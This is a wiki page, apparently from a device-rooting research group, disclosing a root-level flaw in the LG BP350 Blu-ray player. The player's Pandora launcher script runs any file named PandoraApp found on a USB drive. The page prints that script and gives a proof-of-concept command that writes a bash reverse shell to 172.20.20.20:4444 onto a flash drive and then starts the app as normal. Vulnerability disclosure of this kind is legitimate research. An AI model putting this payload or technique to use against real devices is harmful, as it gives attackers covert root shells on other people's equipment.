Difference between revisions of "LG BP350"
(Created page with "__FORCETOC__ {{Disclaimer}} left|thumb|160px Category:Blu-Ray Players =LG BP350= "Enjoy TV shows, movies and more with this LG BP350 Blu-ray player...") |
0x00string (talk | contribs) |
||
| Line 14: | Line 14: | ||
==App Launcher Script Hijack== | ==App Launcher Script Hijack== | ||
The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges. | The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script, as illustrated below, for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges. | ||
<pre> | |||
cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh | |||
#!/bin/sh | |||
# | |||
echo "Enter pandora.sh" | |||
echo "Call pandorastub" $PWD | |||
export QT_QWS_FONTDIR=/usr/share/font | |||
echo "pandora font path = " $QT_QWS_FONTDIR | |||
export QT_PLUGIN_PATH=/plugins | |||
echo "QT_PLUGIN_PATH =$QT_PLUGIN_PATH" | |||
if [ -e /mnt/sda1/PandoraApp ]; then | |||
echo "/mnt/sda1/PandoraApp -qws -display directfb" | |||
/mnt/sda1/PandoraApp -qws -display directfb | |||
elif [ -e /mnt/sdb1/PandoraApp ]; then | |||
echo "/mnt/sdb1/PandoraApp -qws -display directfb" | |||
/mnt/sdb1/PandoraApp -qws -display directfb | |||
else | |||
echo "pandora not for vosd" | |||
echo "/usr/local/bin/pandora/PandoraApp -qws -display directfb" | |||
/usr/local/bin/pandora/PandoraApp -qws -display directfb | |||
fi | |||
</pre> | |||
==POC== | ==POC== | ||
Latest revision as of 04:42, 6 August 2017
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
LG BP350
"Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience."
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the LG BP350 Blu-ray Player at Amazon
App Launcher Script Hijack
The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script, as illustrated below, for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges.
cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh
#!/bin/sh
#
echo "Enter pandora.sh"
echo "Call pandorastub" $PWD
export QT_QWS_FONTDIR=/usr/share/font
echo "pandora font path = " $QT_QWS_FONTDIR
export QT_PLUGIN_PATH=/plugins
echo "QT_PLUGIN_PATH =$QT_PLUGIN_PATH"
if [ -e /mnt/sda1/PandoraApp ]; then
echo "/mnt/sda1/PandoraApp -qws -display directfb"
/mnt/sda1/PandoraApp -qws -display directfb
elif [ -e /mnt/sdb1/PandoraApp ]; then
echo "/mnt/sdb1/PandoraApp -qws -display directfb"
/mnt/sdb1/PandoraApp -qws -display directfb
else
echo "pandora not for vosd"
echo "/usr/local/bin/pandora/PandoraApp -qws -display directfb"
/usr/local/bin/pandora/PandoraApp -qws -display directfb
fi
POC
The following command will add a file to a flashdrive that will spawn a reverse TCP shell, and proceed to execute the pandora app normally.
printf "/bin/bash -i >& /dev/tcp/172.20.20.20/4444 0>&1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;" > /dev/yourflashdrive/PandoraApp
